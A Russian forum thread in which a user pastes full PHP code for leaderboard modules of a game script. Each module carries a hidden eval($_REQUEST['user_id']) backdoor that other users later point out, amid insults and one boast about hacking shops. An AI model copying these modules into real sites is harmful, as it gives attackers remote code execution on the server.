Автор Тема: Инструкция по установке модуля Tоп  (Прочитано 1681 раз)

0 Пользователей и 1 Гость просматривают эту тему.

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 10 сообщений Более 5 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Здравствуйте, есть модули Топ 3 и топ 10, но нет инструкции по установке, очень надеюсь на помощь, а пока .-.0)бамбук:be happy:
 

shans5

  • *
  • *
  • Оффлайн
  • Награды За 1250  созданных тем Репутация более 75 более 4000 сообщений Более 6 лет на форуме !!! Топ 10 по созданным темам Топ 10 по сообщениям Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 43
  • Сообщений: 4314
  • Страна: ru
  • Поблагодарили: 1035 раз(а)
  • Репутация +85/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Инструкция по установке модуля Tоп
« Ответ #1 : 04 Июня 2017, 12:35:09 »
Ну как бы сразу вопрос:

Модули из паблика?
Если да,то скорее всего с дырой.

По установке:

Файл модуля ( допустим он называется _top.php) кидаем в папку pages

В корневой .htaccess ставим

# топ
RewriteRule ^top(/?)+$ index.php?menu=top [L]


В корневой index.php ставим
case "top": include("pages/_top.php"); break; // Топ

Вроде как то так должно быть
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 10 сообщений Более 5 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #2 : 04 Июня 2017, 12:47:58 »
Да, из паблика, можете глянуть одним глазком нащщет дыр..
Скрипт Топ 10:
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]
Спасибо за инструкции ))=(.
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #3 : 04 Июня 2017, 12:55:22 »
Да, из паблика, а где взять не с дырой?
Спасибо за инструкции ))=(.
купить. или самому почистить.
а теперь по делу.
кидай файл топ с обеих модулей посмотрю что там у тебя. бесплатно.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 10 сообщений Более 5 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #4 : 04 Июня 2017, 13:01:59 »
Ок, Топ 10
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]

Топ 3
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 3";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>





<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>




<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</div>

[свернуть]

Кроме рекламной ссылки которая легко удаляется, вродь и ничего и нету
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #5 : 04 Июня 2017, 13:18:32 »
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #6 : 04 Июня 2017, 14:11:54 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
как не старанно но ти тоже незнал я сказал что там дира
a:0:{}
 
Пользователи, которые поблагодарили этот пост: Somnambula

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #7 : 04 Июня 2017, 14:21:00 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
как не старанно но ти тоже незнал я сказал что там дира
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
ты даже саму дыру не правильно показал лишнего захватил так как тебе айболит показал :laugh:
я об этой дыре узнал когда ты еще пешком под стол ходил.
 
Пользователи, которые поблагодарили этот пост: Somnambula

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #8 : 04 Июня 2017, 14:23:20 »
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
я об этой дыре узнал когда ты еще пешком под стол ходил.

ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик

Добавлено сообщение: 04 Июня 2017, 14:25:45
ей прогер макс напиши мне запрос в лс как взломать через етот код еслы я не профи давай жду я по крайней мере знаю а вот ты нет
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #9 : 04 Июня 2017, 14:26:09 »
ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #10 : 04 Июня 2017, 14:33:08 »
и на том сайте все
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #11 : 04 Июня 2017, 14:35:35 »
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
:laugh::laugh::laugh: украинець иди гуляй дальше.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #12 : 04 Июня 2017, 14:36:35 »
:laugh::laugh::laugh: украинець иди гуляй дальше.

теперь понятно кому взлом и нужен
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1754
  • Страна: ru
  • Поблагодарили: 145 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #13 : 04 Июня 2017, 14:41:00 »
:laugh::laugh::laugh: украинець иди гуляй дальше.
вот этот кусок который ты показал не обязательно удалять если ты не в курсе.там всего лишь маленький кусочек и все модуль уже не дырявый становится.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 10 сообщений Более 5 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #14 : 04 Июня 2017, 14:45:51 »
Блинн...ваще не буду подобные модули ставить
 
 

Совместная покупка модуля "сёрфинг" как в motormoney

Автор PasatonРаздел Совместные покупки

Ответов: 7
Просмотров: 2673
Последний ответ 29 Ноября 2017, 10:54:32
от APTEMOH
Совместная покупка модуля Колесо фортуны как у Rich-Birds

Автор takebetРаздел Совместные покупки

Ответов: 62
Просмотров: 3658
Последний ответ 12 Сентября 2017, 06:02:44
от GameRussia
Не могу разобраться с работой модуля конкурса рефералов

Автор siskelruРаздел Вопросы по модулям фруктовых ферм

Ответов: 1
Просмотров: 766
Последний ответ 05 Декабря 2017, 00:17:24
от hdlimon
Совместная покупка модуля Битва между игроками

Автор fordРаздел Совместные покупки

Ответов: 2
Просмотров: 1355
Последний ответ 09 Апреля 2017, 03:41:13
от kvozimir
Подключение автомодерации для модуля серфинг

Автор ZateynikРаздел Разное для фруктовых ферм

Ответов: 12
Просмотров: 5179
Последний ответ 07 Декабря 2017, 08:02:50
от hdlimon